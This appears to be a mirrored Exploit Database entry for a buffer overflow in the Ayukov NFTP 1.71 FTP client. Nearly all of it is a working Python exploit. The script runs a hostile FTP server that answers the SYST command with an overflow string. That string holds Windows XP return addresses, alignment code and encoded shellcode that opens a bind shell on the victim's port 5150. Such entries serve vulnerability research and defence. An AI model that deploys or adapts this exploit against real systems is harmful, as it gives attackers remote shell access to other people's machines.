Ayukov NFTP client 1.71 – ‘SYST’ Buffer Overflow

• Exploit Database
• 124 阅读

• 作者： SYANiDE
  日期： 2019-11-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47576/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177

  # Exploit Title: Ayukov NFTP client 1.71 -&apos;SYST&apos; Buffer Overflow # Date: 2019-11-03 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://ayukov.com/nftp/ # Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe # Version: 1.71 # Tested on: Windows XP Pro SP0, SP1, SP2, SP3 # CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222 # Steps to reproduce: # Run the server with the valid Windows version # Connect the client to the malicious server # bind shell on port 5150   #!/usr/bin/env python2 import os, sys, socket   NARGS = len(sys.argv)   # ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # 7C923A95 FFD6CALL ESI # Windows XP Pro SP3; ntdll.dll # 7C927543 FFD6CALL ESI # Windows XP Pro SP2; ntdll.dll # 77E641C7 FFE6JMP ESI # Windows XP Pro SP1; kernel32.dll # 77E667F3 FFE6JMP ESI # Windows XP Pro SP0: kernel32.dll tourRETs = { "XPProSP3": "\x95\x3A\x92\x7c", "XPProSP2": "\x43\x75\x92\x7C", "XPProSP1": "\xc7\x41\xe6\x77", "XPProSP0": "\xf3\x67\xe6\x77" }     if not NARGS > 1: print("USAGE: %s version" % sys.argv[0]) print("[.] version must be in:") for item in tourRETs: print("\t%s" % item) sys.exit(1)     # sploit = "A"*5000# crash!in SYST cmd, 41414141 in EIP and EBP # ESP and ESI both pointers to somewhere in the As #If I increase the overflow string to 10000, the area ESP points to at crash #, goes from 864 bytes of uninterrupted \x41&apos;s to roughly 4056 bytes. # sploit = "A"*10000 # sploit = sys.argv[1]# $(<code>locate pattern_create.rb|head -n 1</code> 10000) # 46326846 in EIP # <code>locate pattern_offset.rb |head -n 1</code> 46326846 10000# 4116 sploit = "A"*4116   # Add the return address try: sploit +=tourRETs[sys.argv[1]] except KeyError, x: print("[!] Version %s: not a valid version!Possibly bad capitalization" % str(x)) sys.exit(1)   sploit += ("\x90"*12)# original calcs based on RET*4... oops. realign.   # echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc# 0x69D (1693); ESP-ESI sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs     # badchars = "\x00\x0a\x0d" # locate EIP and align ESP to a close future 4 and 16 byte boundary NOTES = """\ $-37 > D9EE FLDZ $-35 > D97424 F4FSTENV (28-BYTE) PTR SS:[ESP-C] $-31 > 59 POP ECX $-30 > 80C1 09ADD CL,9 $-2D > 80C1 04ADD CL,4 $-2A > 80C1 2AADD CL,2A $-27 > 80C5 01ADD CH,1 $-24 > 51 PUSH ECX $-23 > 5C POP ESP """ sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes sploit += "\x90" * 0x22# ESP = EIP sploit += "\x90" * 20# sled for shikata_ga_nai unpack   # msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process # -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c sploit += ( "\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1" "\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57" "\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56" "\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79" "\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3" "\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa" "\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9" "\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82" "\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05" "\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8" "\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74" "\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68" "\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02" "\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde" "\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4" "\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba" "\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f" "\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83" "\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07" "\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51" "\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb" "\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4" "\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04" ) # 355 sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)     cases = { "USER": "331 user OK. Pass required", "PASS": "230 OK, current directory is /", # "SYST": "215 UNIX Type: L8",   "SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP   "TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"", "SITE UMASK": "500 SITE UMASK is an unknown extension", "CWD": "250 OK, current directory whatever you think it is", "PORT": "200 PORT command successful", "PASV": "227 Entering PASV mode", "LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total" }     sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sx.bind(("192.168.56.181",21)) sx.listen(5) print("[.] Standing up HostileFTPd v0.0 alpha, port 21") cx,addr = sx.accept() print("[!] Connection received from %s" % str(addr)) cx.send("220 HostileFTPd v0.0 alpha !\r\n") notified = 0 while True: req = cx.recv(1024) for key, resp in cases.items(): if key in req: cx.send(resp + "\r\n") if "SITE UMASK" in req and notified == 0: print("[!]Buffer sent.Bind shell on client&apos;s port 5150?") notified = 1 if "PASV" in req: justpause = raw_input("[.] PASV received.Pausing recv buffer")     NOTES="""\ ### followed TCP stream in normal client connect to ftp server 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 13:47. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. USER bozo 331 User bozo OK. Password required PASS theclown 230-User bozo has group access to:1003 230 OK. Current directory is / SYST 215 UNIX Type: L8 TYPE I 200 TYPE is now 8-bit binary SITE UMASK 022 500 SITE UMASK is an unknown extension CWD / 250 OK. Current directory is / PASV 227 Entering Passive Mode (192,168,56,181,183,29) LIST -a 150 Accepted data connection 226-ASCII 226-Options: -a -l 226 3 matches total """